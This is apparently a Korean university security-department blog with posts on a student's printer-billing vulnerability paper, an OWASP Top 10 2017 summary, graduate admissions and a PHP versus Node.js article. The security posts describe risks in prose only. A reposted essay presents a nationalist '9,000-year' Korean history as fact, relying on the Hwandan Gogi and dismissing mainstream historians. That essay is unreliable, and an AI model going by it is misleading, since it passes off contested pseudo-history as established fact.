admin

2017년 정보보호학회 동계학술대회 우수논문상 선정

 새소식  Comments Off on 2017년 정보보호학회 동계학술대회 우수논문상 선정
Nov 262017
 

우리 학과의 지우중 학생이 2017년 정보보호학회 동계학술대회에서 “프린터 관리 시스템의 취약점 분석”이라는 제목의 논문을 발표합니다. 대학이나 공공기관 등에서 현재 널리 사용하고 있는 프린터 관리 시스팀의 과금방식이 취약하여 해킹위협이 있다는 내용입니다. 현재 사용하고 있는 프린터 관리 시스템은 보안통신을 사용하지도 않고 장치를 인증하지도 않아 마음만 먹으면 해커가 변조된 패킷을 보내서 돈을 마음대로 충전하여 사용할 수도 있습니다. 해당 사업자는 빨리 문제점을 해결해야 하겠지요.

이 논문은 우수논문으로 선정되기도 했습니다. 지우중 학생의 성과를 함께 축하합니다.

http://cisc.or.kr/program/

 

 Posted by at 5:39 PM

9천년 한민족사는 신화가 아니라 현실 역사다

 역사  Comments Off on 9천년 한민족사는 신화가 아니라 현실 역사다
Nov 172017
 

1. ‘고기’의 존재
‘삼국유사’에는 단군조선의 건국이 요임금 50년 때, 그러니까 경인庚寅년이라 쓰여 있다. 이는 그저 책을 쓴 일연 스님의 추정이나 생각이 아니다. 당시에는 실재하던 ‘고기古記’라는 역사책을 그대로 인용하는 대목에서 이 연도가 나온다. 같은 고려시대 이승휴의 ‘제왕운기’에는 단군조선의 건국 연도를 요임금 즉위 원년인 무진년이라 했다. 단군조선과 요임금의 나라가 같은 해 건국됐다는 것이다.
그런데 조선 전기에 편찬된 대표적인 관찬官撰 사서인 ‘동국통감’에는 ‘당요 25년 무진년’이라 하고 있다. 즉 요임금 시대의 무진년이 그 원년인지 아니면 25년인지 ‘제왕운기’와 ‘동국통감’의 견해가 서로 달랐던 것이다. 만약 무진년을 요임금 25년이라고 한다면 그가 즉위한 원년은 갑진년(서기전 2357년)이 된다.
‘환단고기’의 ‘단군세기’에서도 당시 전해지던 ‘고기’라는 역사책을 그대로 인용해 단군왕검의 재위 원년을 무진년으로 못박고 있다. ‘단군세기’가 ‘삼국유사’처럼 ‘고기’를 인용하면서도 단군조선의 건국 연도에서 차이를 보이는 것은 ‘고기’의 판본이 여럿 존재했으며 그 판본들의 내용이 조금씩 달랐기 때문이다.
‘환단고기’에는 단군조선의 역대 47세 단군들의 역년歷年이 기록되어 있는데 그것에 바탕해서 역산을 해보면 무진년은 서기전 2333년이 된다. 참고로 요임금이 무진년에 즉위했다는 ‘무진년 원년설’은 중국의 정사 기록들에서도 많이 채택하고 있는 설이다.

2. 고고학자나 역사학자들은 한민족이 청동기를 사용하기 시작한 때가 대략 서기전 1500년에서 1300년이라고들 말한다. 만약 단군조선의 건국 연도가 서기전 2333년이라면 청동기시대보다 훨씬 앞선 신석기시대에 나라를 열었다고 할 수 있을까?
최근 발굴된 고고학 유물들은 동북아의 청동기시대, 그 연대를 학계가 추정해오던 것보다 훨씬 앞선 쪽으로 올려놓았다. 1980년대 중국 요령성 건평현 우하량에서는 청동기를 주조한 흔적이 있는 토기 도가니 파편과 청동제 고리, 거푸집 등 청동기시대 유물들이 발견됐다. 또 인근 내몽골 적봉시 오한기에서는 청동 거푸집까지 나왔다.
중국 학계에서는 이 청동 유물들의 연대를 약 5000년 전으로 추정한다. 그 전까지 중국학자들은 중국의 청동기시대 상한上限 시기를 서기전 2000년경으로 보았는데 앞의 유물들이 발굴되면서 그 연대가 1000년이나 더 오래된 것으로 밝혀진 것이다.
이런 사실들을 종합하면 단군조선은 분명히 청동기시대에 출현했다, 그렇게 말할 수 있다. 고조선이 신석기시대에 건국되었다? 그것은 맞지 않다. 단군조선보다 앞선 배달국 치우천황이 이미 금속 무기를 만들었다는 역사 기록을 감안해도 단군조선은 청동기 시대에 건국된 것이 분명하다.

3. 단군조선의 건국
‘삼국유사’에 처음 나온다. 문제는 거기서 단군조선의 건국과정을 신화 같은 이야기로 간략히 소개한 것이다. 나중에 그것을 빌미로 일제가 실제로 단군조선의 역사를 신화로 왜곡해서 지금까지 단군조선은 신화다, 하는 잘못된 인식이 퍼지게 됐다.
특히 단군조선을 건국하는 과정과 관련해 ‘삼국유사’에서 곰과 호랑이 운운한 대목은 그야말로 역사적인 사실을 단순히 신화 형태로 서술한 것이다. 일찍이 천손天孫족을 자처하며 동방으로 이주한 환웅족이 동방의 토착 원주민이던 호족虎族과 웅족熊族을 아우르는 과정에서 호족 아닌 웅족과 손잡고 나라 세운 사실史實을 신화 형태로 표현한 것이다.
단군조선의 건국에 대해 가장 신뢰할 만한 기록은 행촌 이암의 ‘단군세기’다. 이암은 ‘고기’를 그대로 인용하고 있는데, 단군조선의 건국자인 단군왕검의 아버지는 단웅檀熊이요, 어머니는 웅씨 왕의 따님이다. 그런데 단군왕검은 일찍이 14세에 웅씨국의 비왕裨王(한 지역을 맡아 다스리는 군왕)이 되었다.
여기서 웅씨국은 곰을 토템으로 하는 국가로 추정된다. ‘단군세기’에서는 이 나라를 대읍국大邑國#이라 기록하고 있는데 배달국에서도 중심이 되는, 큰 세력을 가진 나라로 보인다.
대읍국 통치 경험을 쌓은 단군왕검은 38세에 아사달에서 백성들의 추대로 천제의 아들, 곧 천자天子가 되었다. 그는 이처럼 왕의 자리에 오른 직후 이전까지 아홉 갈래로 갈라졌던 환족(=九桓族)을 하나로 통일했다.
단군왕검이 배달국을 계승했다는 것은 ‘삼국유사’의 단군조선 건국 이야기에서 자연스럽게 드러나지만 실제로 ‘단군세기’에 남겨진 기록, 곧 ‘왕검이 신시 배달의 법규를 되살렸다’는 대목에서도 분명히 알 수 있다.
단군조선이 당당하게 실재한 국가였음을 증명하는 기록 중에는 갑골문도 있다. 갑골문에 따르면 은나라 제22세 왕인 무정武丁(서기전 1325∼서기전 1266년)은 수많은 정벌전쟁을 벌였는데 지금의 섬서성과 산서성 서북 일대에 살던 북방족인 귀방鬼方을 공격했다는 내용이 있다.
그런데 이 같은 사실이 ‘환단고기’의 ‘단군세기’에도 그대로 쓰여 있다. “제21세 소태단군 47년(서기전 1291년)에 은나라 제22세 왕 무정武丁이 전쟁을 일으켜 귀방을 물리치고 나서 다시 단군조선의 제후국들을 침공하다가 우리 군사에 대패하여 화친을 청하고 조공을 바쳤다”는 기록이다.
이처럼 시대를 달리 하는 여러 기록들이 단군조선이 분명한 우리 역사였음을 생생하게 확인시켜 주고 있다.

4. 단군조선에서 북부여로 이어지는 과정? 부여에 대해 알기 위해서는 단군조선 말기의 정치상황부터 돌아봐야 한다.
단군조선은 삼한관경제가 삼조선제로 바뀌면서 점점 그 세력이 약해졌다. 그러다 제43세 물리단군 때 사냥꾼인 우화충이 역모를 일으켜 도성을 공격하는 사건이 일어난다. 이 사건으로 물리단군이 피난길에 올랐는데 그 도중에 붕어崩御하게 된다. 이런 가운데 당시 욕살(=지방장관) 구물이 장당경에서 군사를 일으켜 반란을 평정한다. 그러고는 주위 사람들의 추대를 받아 제44세 단군에 즉위한다. 이 분이 구물단군!!
구물단군의 즉위는 단군조선 역사에서 중요한 전기점이 되는데 먼저 그는 도읍을 종래 백악산에서 장당경으로 옮기면서 단군조선의 제3왕조 시대를 열었다. 나아가 국호도 조선에서 ‘대부여’로 바꾸었다. 이때까지도 나라의 틀이 형식상으로는 삼조선 체제가 유지되고 있었다. 그 가운데 진조선이 대부여로 이름을 바꾼 것이다. 기존의 다른 두 조선, 그러니까 번조선과 막조선은 그대로 유지되면서 대부여와 함께 여전히 한 나라를 이루고 있었던 것!!
그런데 이들 번조선과 막조선이 점차 독자적인 병권兵權을 가지면서 대부여의 통제에서 벗어나 실질적인 독립국이 된다. 이 때문에 종래 단군조선의 통치체제인 삼한관경제가 유명무실해지고 이로 인해 대부여 또한 오래가지 못하고 약화된다. 대부여의 제47세 고열가단군을 끝으로 대부여(=진조선)는 그 역사의 막을 내리고(서기전 239년) 그 뒤를 해모수의 북부여가 계승한다. 진조선은 이처럼 대부여를 거쳐 북부여로 계승된다.

5. 국사 교과서를 보면 단군조선 다음에 북부여가 아니라 위만조선?
위만조선이라는 나라는 없었다. 정확한 명칭은 위만정권이라고 해야 한다. 그것은 단군조선의 서쪽 영토 일부를 일시적으로 장악했던 지방 정권에 불과했다.
대륙의 북부여가 진조선을 계승한 직후 그 서쪽의 번조선 땅에는 중국에서 넘어온 난민들로 넘쳐났다. 위만은 그런 난민들의 우두머리격 인물이었다. 당시 번조선을 다스리던 준왕이 위만을 받아들이고 번조선의 서쪽 변방을 지키는 장수로 임명하는 등 은혜를 베풀었다. 그런데 정작 위만은 자신의 임지에서 몰래 세력을 길러 서기전 194년 준왕의 왕검성을 친 것이다. 그렇게 준왕을 몰아내고는 스스로 ‘번조선 왕이다’ 칭하고 왕위를 차지하는 배은망덕한 일을 저질렀다.
이 같은 위만정권을 일연의 ‘삼국유사’, 나아가 지금의 강단사학계에서 버젓이 위만조선이라고 부르는 것이다. 그러나 이는 잘못된 호칭이다. 위만정권에 조선이라는 이름을 갖다 붙여서는 안된다.
번조선 역시 단군조선을 이루던 삼조선의 하나였다. 하지만 당시 조선의 중심은 진조선이었다. 그 진조선의 국통은 분명히 구물단군의 대부여를 거쳐 해모수의 북부여로 이어졌다. 그것이 올바른 국통 맥이다. 반란을 통해 그저 일시적으로 왕위를 찬탈했던 위만에게 단군조선의 계승국을 의미하는 조선이란 명칭을 붙여서는 안 된다.

6. 북부여의 제6세 고무서단군이 후사 없이 죽자 그 사위인 주몽이 대통을 이어받았다. 고구려의 시작!!
주몽은 잘 알려진 것처럼 유화부인의 아들이다. 유화부인은 혼인 전 몰래 임신해 부모에게서 쫓겨났는데 마침 동부여의 해부루 왕이 그녀를 동부여로 데려갔다.
이렇게 해서 주몽은 동부여의 왕궁에서 태어났다. 그러나 동부여 사람들의 질시로 신변의 위협을 받자 (자기의 고향이라 할) 북부여로 탈출한다. 그리고는 북부여를 다스리던 고무서단군의 둘째 딸 소서노와 결혼, 고무서단군의 사위가 되어 나중에 왕위를 물려받고 고구려를 열게 된다.
이처럼 주몽이 건국한 고구려가 일찍이 해모수가 세운 북부여로부터 나왔다는 사실은 ‘환단고기’는 말할 것도 없고 ‘삼국유사’에도 분명히 나와 있다. ‘삼국사기’는 주몽이 동부여에서 왔다고 기록하고 있지만 광개토왕비 역시 주몽의 출자가 북부여라고 밝히고 있다. ‘삼국사기’보다 시대적으로 훨씬 앞선 광개토왕비문의 내용이 정확한 것임은 두말할 여지가 없다.

7. 백제와 신라
백제는 고구려에서 직접 갈려나온 나라.. 소서노의 아들 온조와 비류가 함께 남쪽으로 이주해 백제를 세웠다.
신라 역시 부여와 밀접한 관계 속에 나라가 세워졌다. 일찍이 북부여 제실의 딸인 파소婆蘇(삼국유사에는 사소娑蘇라고 기록됐는데 북부여 고두막한의 딸로 추정됨)가 아버지 없이 아이를 잉태하는 바람에 뭇 사람들의 눈총을 받게 되자 당시 진한 땅으로 이주한다. 그렇게 이주한 뒤 낳은 아들이 곧 신라의 시조인 박혁거세이다. ‘삼국유사’에는 파소가 중국 제실의 딸이다, 그렇게 쓰여 있는데 이는 북부여의 제실을 잘못 기록한 것이다. 신라에서 성산으로 모시는 성모산의 ‘성모聖母’#가 바로 이 파소 부인을 가리킨다.
중요한 것은 이처럼 고구려 백제 신라를 건국한 시조들뿐 아니라 그 주민들 또한 대부분 단군조선의 유민들이었다. 한민족의 후예들인 것이다. 고구려, 백제, 신라는 모두 이처럼 단군조선과 북부여의 국통 맥을 이은 한민족의 나라들이었다.

8. 고대 우리 민족의 문화
단군조선의 강역이던 요령성에서 청동기 문화가 시작된 때는 적어도 서기전 2500년경이다. 이에 비해 중국 황하 유역의 청동기 문화는 단군조선보다 훨씬 뒤인 기원전 2200년경에 시작됐다. 여느 지역보다 시기적으로 앞서 시작된 단군조선의 청동기 문화는 농기구, 제기, 무기 등 제반 도구의 제작기술 수준에 있어서 다른 데보다 높았다. 나아가 단군조선 때는 이미 직물의 생산기술 역시 상당히 발전했다.
지금까지 발견, 발굴된 고고학 자료에 따르면 고대 한민족이 비단을 생산하기 시작한 시기는 중국과 비슷한 서기전 2700년경이다. ‘환단고기’에 보면 초대 단군왕검이 하백의 딸을 황후로 맞이해 누에치기를 관장하게 했다는 기록이 있다.
이 같은 사실은 배달국 말기에 이미 비단이 생산됐음을 보여주는 고고학 자료를 통해 뒷받침된다. 단군조선에서 재배한 뽕나무와 그것으로 기른 누에는 중국 것과는 엄연히 다른 품종이었다. 또 비단의 직조방법과 염색기술도 중국과는 다른 독자적인 것이었다. 단군조선의 직조織造기술은 중국보다 앞섰으며 비단의 종류 또한 단군조선에 더 많았다. 단군조선 시대의 유물, 홍산문화권의 유물, ‘환단고기’의 기록 등을 근거로 동서양 교류 역사를 담고 있는 기존의 실크로드(Silk Road 비단길) 역사까지도 새로 쓰여야!!
이미 고대 한국에서는 서기전 25세기에 청동 단추로 장식된 복식을 착용했고 그 뒤에는 갑옷과 투구에 이를 응용했다. 시베리아의 청동기문화가 서기전 1800년경에 시작되었으니(학계 추정) 단군조선은 중국과 북방 민족들보다 훨씬 앞서 가장 이른 시기에 청동 단추로 장식한 갑옷을 생산한 것이다. 묶은 머리(상투)를 고정시키는 옥고玉箍#를 통해 고대 한국인의 문화적 우수성을 볼 수 있다.
단군조선 시대의 문화수준을 보여주는 저 홍산문화 유적지에서는 옥으로 만든 옥고가 대량 발굴됐다. 바로 이 옥고에서 우리 금관의 기본 양식이 비롯되었다. 지금까지 전세계에서 발굴된 옛 금관의 3분의 2가 우리나라에서 나왔다. 금관의 종주국!!

9. 현 상황
일제는 식민지 문화정책으로 단군조선의 역사를 신화로 왜곡하고 나중에는 아예 우리 역사에서 송두리째 들어냈다. 그 바람에 일제가 한반도를 지배한 이후 단군조선의 역사는 그저 신화로 이야기되고, 한민족사는 이른바 위만정권 때부터 시작된 것으로 축소, 서술됐다. 개탄스러운 것은 그렇게 왜곡된 단군신화론 나아가 위만정권 이후 2000년으로 쪼그라든 한민족사가 마치 진실인 양 이 땅의 주류 사학자들에 의해 후세들의 뇌리에 뿌리를 박았다. 그들은 이른바 실증사학을 앞세우면서 일제가 남긴 식민사학의 해독을 이 나라에 퍼뜨려 왔다.
나라가 광복된 지 70년 가까이 됐어도 우리 역사는 광복되지 못했다. 지금까지 우리 눈을 가렸던 저 식민사관과 중화사관의 안대를 벗어버리고 한민족사를 바로 세워야 한다. 9천년 한민족사는 신화 따위가 아니다. 힘겨운 고비는 많았지만 국통이 끊어진 적 없이 지금까지 생생한 현실로, 당당한 역사로 이어져 왔다.

한뿌리사랑 세계모임 이영희 님의 글을 퍼옴.

 Posted by at 9:23 AM

OWASP Top 10 – 2017년 발표

 IT, 정보보호  Comments Off on OWASP Top 10 – 2017년 발표
Apr 242017
 

http://www.boannews.com/media/view.asp?idx=54393 

OWASP Top 10 – 2017…4년마다 한 번씩 보안위협 발표
올해 버전, 취약한 공격 방어와 취약한 API 추가

[보안뉴스 원병철 기자] 4년마다 한 번씩 취약점 Top 10을 발표하는 OWASP(The Open Web Application Security Project)가 지난 4월 초 ‘OWASP Top 10 – 2017’을 발표했다. 비영리재단인 OWASP는 어떠한 기업과도 제휴나 협약을 맺지 않고, 상업적인 목적이나 이윤 압박이 없기 때문에 애플리케이션 보안에 대해 공정하고 실질적이며, 효율적인 정보를 제공하고 있다.

OWASP Top10은 8개의 컨설팅 회사와 3개의 제품 공급업체를 포함해 애플리케이션 보안전문 업체의 11개 대형 데이터셋을 기반으로 작성된다. 이번 2017 버전은 지난 2013년 이후 처음으로 두 개의 항목이 신설됐다. 첫 번째는 취약한 공격 방어항목이며, 또 하나는 취약한 API 항목이다.

△ 인젝션
SQL, OS, XXE, LDAP 인젝션 취약점은 신뢰할 수 없는 데이터가 명령어나 쿼리문의 일부분이 인터프리터로 보내질 때 발생한다. 공격자의 악의적인 데이터는 예상하지 못하는 명령을 실행하거나, 적절한 권한 없이 데이터에 접근하도록 인터프리터를 속일 수 있다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 인증 및 세션관리 취약점
인증 및 세션 관리와 관련된 애플리케이션 기능이 종종 잘못 구현되어 공격자에게 취약한 암호, 키 또는 세션 토큰을 제공해 다른 사용자의 권한을 (일시적으로 또는 영구적으로) 얻도록 익스플로잇한다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 크로스 사이트스크립팅(XSS)
XSS 취약점은 애플리케이션이 적절한 유효성 검사 또는 이스케이프처리 없이, 새 웹 페이지에 신뢰할 수 없는 데이터를 포함하거나, JavaScript를 생성할 수 있는 브라우저 API를 사용해 사용자가 제공한 데이터로 기존 웹 페이지를 업데이트한다. XSS를 사용하면 공격자가 희생자의 브라우저에서 사용자 세션을 도용하거나, 웹사이트를 변조시키거나, 악성사이트로 리다이렉션 시킬 수 있다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 취약한 접근제어
취약한 접근제어는 인증된 사용자가 수행할 수 있는 작업에 대한 제한이 제대로 적용되지 않는 것을 의미한다. 공격자는 이러한 결함을 악용해 다른 사용자의 계정에 액세스하거나, 중요한 파일을 보고 다른 사용자의 데이터를 수정하거나, 접근 권한을 변경하는 등 권한 없는 기능 또는 데이터에 접근할 수 있다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 보안 설정 오류
바람직한 보안은 애플리케이션, 프레임워크, WAS, 웹 서버, DB 서버 및 플랫폼에 대해 보안 설정이 정의되고 적용되어 있다. 보안 기본 설정은 대부분 안전하지 않기 때문에 정의와 구현, 그리고 유지라는 3박자가 잘 이루어져야 한다. 또한, 소프트웨어는 최신 버전으로 관리해야 한다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 민감 데이터 노출
대부분의 웹 애플리케이션과 API는 금융정보, 건강정보, 개인식별정보와 같은 민감정보를 제대로 보호하지 못한다. 공격자는 신용카드사기, 신분도용 또는 다른 범죄를 수행하는 취약한 데이터를 훔치거나 변경할 수 있다. 브라우저에서 중요 데이터를 저장 또는 전송할 때 특별히 주의해야 하며, 암호화와 같은 보호조치를 취해야 한다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 공격 방어 취약점
대부분의 애플리케이션과 API에는 수동 공격과 자동 공격을 모두 탐지하거나 방지·대응할 수 있는 기본 기능이 없다. 공격 보호는 기본 입력 유효성 검사를 훨씬 뛰어넘으며, 자동 탐지, 로깅, 응답, 익스플로잇 시도 차단을 포함한다. 애플리케이션 소유자는 공격으로부터 보호하기 위해 패치를 신속하게 배포할 수 있어야 한다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 크로스 사이트 요청 변조(CSRF)
CSRF 공격은 로그인된 피해자의 취약한 웹 애플리케이션에 피해자의 세션 쿠키와 기타 인증정보를 포함해 위조된 HTTP 요청을 강제로 보내도록 한다. 예를 들어, 공격자가 취약한 어플리케이션이 피해자의 정당한 요청이라고 오해할 수 있는 요청들을 강제로 만들 수 있다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 알려진 취약점이 있는 컴포넌트 사용
컴포넌트, 라이브러리, 프레임워크 및 다른 소프트웨어 모듈은 애플리케이션과 같은 권한으로 실행된다. 이런 취약한 컴포넌트를 악용해 공격하는 경우, 심각한 데이터 손실이 발생하거나 서버가 장악된다. 알려진 취약점이 있는 구성 요소를 사용하는 애플리케이션과 API는 어플리케이션을 약화시키고 다양한 공격과 영향을 줄 수 있다.

▲ 자료제공 : 블랙팔콘 이지혜

△ 취약한 API
최신 어플리케이션에는 일종의 API (SOAP / XML, REST / JSON, RPC, GWT 등)에 연결되는 브라우저 및 모바일 애플리케이션의 자바스크립트(JavaScript)와 같은 여러 클라이언트 애플리케이션 및 API가 포함되는 경우가 많다. 이러한 API는 대부분 보호되지 않으며 수많은 취약점을 포함한다.

▲ 자료제공 : 블랙팔콘 이지혜

OWASP 측은 이번 Top 10외에도 ‘OWASP Developer’s Guide’와 ‘OWASP Cheat Sheet Series’에서 수백 개의 웹 어플리케이션 위협요소를 다룬다며, 웹 애플리케이션 개발자라면 반드시 참고할 것을 권고했다. 또한, 보안 취약점은 아주 복합적이며 엄청난 코드 더미 사이에 숨어 있기 때문에 좋은 도구를 활용할 수 있는 보안전문가를 활용하라고 조언했다.

무엇보다 보안이 개발조직 전반에 걸쳐 필수적인 요소라고 인식하는 문화를 만드는 것이 중요하다고 OWASP는 강조했다.

한편, OWASP 한글 번역본은 블랙팔콘(Black Falcon) 이지혜 씨가 제공했으며. 전문은 블랙팔콘 블로그에서 받을 수 있다.

 Posted by at 8:47 AM

2017학년도 전기 산업보안학과 석사과정 모집

 새소식  Comments Off on 2017학년도 전기 산업보안학과 석사과정 모집
Nov 072016
 

중부대학교 인문산업대학원에서는 2017학년도 전기 산업보안학과 석사과정을 모집합니다. 인문산업대학원은 산업체 인력들에게 우수한 재교육 기회를 제공하는 것을 목표로 하고 있으며, 2017학년도부터 고양캠퍼스에서 운영합니다. 산업보안학과에서는 정보보호 기술을 바탕으로 사이버보안, 물리적보안, 융합보안 등의 다양한 산업보안 문제를 통합적으로 해결할 수 있는 산업보안 전문인력 양성을 목표로 합니다.
관심있는 분들은 문의 바랍니다.

1. 원서접수: 2016.10.24(월)~11.25(금)
2. 접수처: 진학사(하단 링크 참조)
3. 면접: 2016. 12. 16(금)
4. 등록기간: 2017.1.2~1.9

%eb%8c%80%ed%95%99%ec%9b%90%ec%9e%85%ed%95%99%eb%aa%a8%ec%a7%91%ec%9a%94%ea%b0%95-1 %eb%8c%80%ed%95%99%ec%9b%90%ec%9e%85%ed%95%99%eb%aa%a8%ec%a7%91%ec%9a%94%ea%b0%95-2

http://bank1.jinhakapply.com/ApplyV8/Wonseo/Yui/Yui113152.aspx?UnivServiceID=113152&GunID=4 

 Posted by at 4:20 PM

PHP와 Node.js의 전쟁

 node.js  Comments Off on PHP와 Node.js의 전쟁
Aug 012016
 

퍼온 글

http://www.itworld.co.kr/news/91449

친구였던 PHP와 Node.js, 서로간의 전쟁이 시작되다

Peter Wayner | InfoWorld
각자 다른 길을 걷게 된 오랜 친구 사이의 ‘전쟁’은 할리우드 영화에서 흔히 찾아볼 수 있는 플롯이다. 이때 한 사람이 지금까지 다른 사람의 영역이었던 무언가를 욕심내면서 전쟁이 시작되는 경우가 많다. 프로그래밍 언어 부문에서도 이런 일이 일어나고 있다.

치열한 전쟁은 Node.js의 등장으로 시작됐다. PHP와 자바스크립트(JavaScript)는 한때 파트너로 인터넷 세상을 함께 지배했지만, 지금은 개발자 ‘점유율’을 놓고 서로 치고 받으면서 일전을 벌이고 있다.

과거, 두 언어가 협력한 방식은 간단했다. 자바스크립트는 브라우저의 ‘디테일’을 처리하고, PHP는 포트 80과 MySQL 사이에 존재하는 서버 수준의 작업 일체를 관리했다. 인터넷의 많은 중요 요소들을 계속 지원해온 행복한 ‘연합’이었다.

그러다 누군가 서버에서 자바스크립트를 구현시켰다. PHP를 사용하지 않고도 차세대 서버 스택을 구축할 수 있게 된 것이다. 한 언어만 가지고 클라이언트에서 실행되는 Node.js와 프레임워크들을 구축할 수 있게 됐다. 적어도 일부에게는 “모든 곳에 자바스크립트가 있다”가 마치 ‘주문’처럼 대두됐다.

물론 아직까지는 ‘마지막 장’이 완성되지 않았다. Node.js의 깨끗함과 도처에 위치한 자바스크립트의 편리함을 소리 높여 반기는 사람이 있지만, 동시에 PHP의 오랜 안정성과 깊은 코드 기반에 만족하는 사람들도 있다.

PHP가 서버 부문에서 갑작스레 부상한 신생 강자에게 반격을 가할까? 아니면 자바스크립트가 오랜 친구를 무너뜨리고 세상을 지배할까? 팝콘을 먹으며 영화를 감상하듯 느긋하게 지켜볼 일이다.

PHP의 강점: 코드와 콘텐츠의 혼합
타이핑을 하면서 웹사이트에 생각한 내용을 텍스트로 집어 넣거나, 프로세스에 가지를 더하고, URL의 일부 파라미터에 따라 예쁘게 다듬어 나가고 싶을 수 있다. 또는 데이터베이스에서 가져온 데이터나 텍스트를 통합하고 싶을 수 있다.

PHP에서는 마법과 같은 PHP 태그를 열어, 단 몇 초 만에 코드 개발을 시작할 수 있다. 탬플릿이 필요 없다. 모든 것이 탬플릿이기 때문이다. 추가 파일이 필요 없다. 아키텍처를 발전시킬 필요도 없다. 손가락으로 실현시킬 프로그램 논리만 있으면 된다.

Node.js의 강점: 걱정거리 분리
하지만 코드를 콘텐츠와 섞다 보면 ‘절름발이’가 될 수 있다. 처음 2~3번 정도는 코드를 HTML과 섞는 작업이 재미있을 것이다. 그러나 얼마 지나지 않아, 코드 기반이 ‘헝클어진 논리 덩어리’가 되고 만다.

출중한 프로그래머라면 구조를 추가시키고, 코스메틱 계층을 논리 계층과 분리시킨다. 다른 프로그래머가 훨씬 쉽게 파악, 유지관리 할 수 있기 때문이다. 모델, 뷰, 컨트롤러를 분리하는 것이 낫다는 사실을 알고 있는 프로그래머는 Node.JS를 실행시키는 프레임워크를 구축한다.

PHP의 강점: 깊은 코드 기반
웹은 PHP 코드로 가득하다. (워드프레스, 드루팔, 줌라) 등 대다수 인기 플랫폼들이 웹사이트 구축에 PHP를 사용한다. 오픈소스는 물론 플러그인도 있다. 어디를 가도 PHP 코드를 찾을 수 있다. 즉시 다운로드 받아, 자신의 필요에 맞게 수정해 이용하면 된다.

Node.js의 강점: 현대적 기능
우수한 오픈소스 PHP 파일이 많지만 일부는 8년 묵은 워드프레스 플러그인이다. 몇 년 동안 업데이트가 되지 않은 코드를 만지작거리는데 시간을 투자할 사람이 있을까? Node.js 플러그인은 훨씬 새롭다. 최신 아키텍처 기법이 적용되어 있다. 최신 웹 앱을 이해하는 프로그래머들은 클라이언트에 더 많은 지능을 넣기 위해 이를 이용하게 될 것이다.

평이성: PHP가 우세 (어느 정도)
PHP의 변수와 기본 기능은 소수다. 데이터를 포트 80에서 데이터베이스로 옮기거나, 데이터베이스에서 포트 80으로 다시 옮기는 것을 제외하고는 별다른 큰 일을 하지 않는 얇은 계층이다. 원래 그런 목적에서 개발된 언어이다. 최신 데이터베이스는 마법과도 같은 툴이기 때문에 무거운 작업을 떠넘기는 것 또한 말이 된다. PHP는 아주 복잡하지 않은, 적당하게 복잡한 작업을 처리하는 평이성을 갖고 있다.

클로저 등의 정교성: Node.js의 우세
자바스크립트는 일부에게는 까다로운 소소한 특성들을 많이 갖고 있다. 그러나 현대적인 신텍스와 클로저(Closure) 등 유용한 기능을 자랑하는 현대적인 언어라는 장점이 더 크다. 쉽게 재구성 및 확장해 jQuery 같은 강력한 라이브러리를 구현할 수 있다. 객체로 기능을 배포할 수도 있다. 제약이 적다는 의미다.

PHP의 강점: 클라이언트 앱이 필요 없음
브라우저와 서버에서 같은 언어를 사용한다는 개념은 근사하다. 그러나 브라우저에서 언어를 사용할 필요가 없는 경우는 어떨까? 또 데이터를 HTML 양식으로 내보내야 하는 경우는 어떨까?

20여 개의 웹 서비스 콜로 브라우저에서 페이지를 생성해야 하는 자바스크립트 쓰레드가 제대로 작동하지 않아 초래되는 골칫거리가 없다. 깨끗한 HTML만으로 충분한 경우가 있다. 그리고 PHP는 여기에 최적화 된 언어다. 브라우저에 자바스크립트를 탑재시키느라 애를 쓸 필요가 있을까? 모든 것을 서버에서 구현하면, 스마트폰의 작은 브라우저에 초래되는 부담을 없앨 수 있다.

Node의 강점: HTML이 많은 PHP 콜보다 서비스 콜이 작음
AJAX가 많은 HTML5 웹에는 이동하는 요소가 너무 많을 수 있지만, 이들은 ‘쿨’하고 아주 효율적이다.

브라우저 캐시에 자바스크립트가 코드가 있을 경우, 네트워크에서 이동을 하는 유일한 요소는 새 데이터뿐이다. HTML 마크업이 많지 않다. 전체 페이지를 다운로드 받기 위해 반복을 하지 않는다. 데이터만 바뀔 뿐이다. 멋진 브라우저 기반 웹 앱을 만들 계획을 갖고 있다면, 큰 보상이 있을 것이다.

Node.js는 웹 서비스를 통해 데이터만 전달하게끔 최적화되어 있다. 앱이 복잡하고 데이터가 많다면, 효율적인 전달에 좋은 토대가 될 것이다.

SQL: PHP가 우세
PHP는 MySQL, 그리고 MariaDB 등 많은 변종과 공존하게끔 설계되어 있다. MySQL이 아니라도 오라클과 마이크로소프트의 좋은 SQL 데이터베이스들이 있다. 쿼리에 맞게 조금만 코드를 변경하면 된다. 이게 다가 아니다. 안정적이고, 잘 개발된 코드라면 어떤 SQL 데이터베이스와도 호환이 될 것이다. PHP 프로젝트에 무엇이든 쉽게 통합시킬 수 있다는 의미다. 완벽하지는 않지만, 큰 장점이 있다.

JSON: Node.js의 우세
SQL 액세스가 필요한가? Node.js에는 이를 지원할 라이브러리들이 있다. 여기에 더해 최신 NoSQL 데이터베이스 가운데 상당수를 지원하는 JSON도 지원한다.

PHP 스택에서는 JSON 라이브러리를 쓸 수 없다는 소리는 아니다. 그러나 자바스크립트에서 JSON을 처리하기가 훨씬 용이하다. 브라우저, 웹 서버, 데이터베이스까지 하나의 신텍스를 사용하는 것이다. 콜론과 괄호가 같은 방식으로 사용된다. 이것만으로도 많은 시간을 절약할 수 있다.

코딩 속도: PHP가 우세
PHP를 이용한 웹 앱 개발이 훨씬 빠른 개발자가 더 많다. 컴파일러, 배치, JAR 파일, 전처리기(선행처리기)가 필요 없기 때문이다. 즐겨 쓰는 에디터, 디렉토리의 PHP 파일만 있으면 된다. 물론 구체적인 속도는 천차만별이다. 그러나 속도 면에서는 PHP가 이용하기 좋은 툴이다.

로우 속도: Node.js의 우세
괄호와 소괄호 등의 수를 세면, 자바스크립트 코드 개발이 더 어렵다고 판단할 수 있다. 그러나 완성됐을 경우, Node.js는 날아다닌다. 쓰레드와 씨름할 필요가 없는 콜백 메커니즘이 우수하다. 핵심 요소들이 필요한 것들을 우수하게 처리할 수 있게끔 잘 구축 및 설계되어 있다. 결국 누구나 원하는 것이 아닌가?

*Peter Wayner는 지금까지 16권 이상의 서적을 집필한 인포월드 전문기고가다. ciokr@idg.co.kr

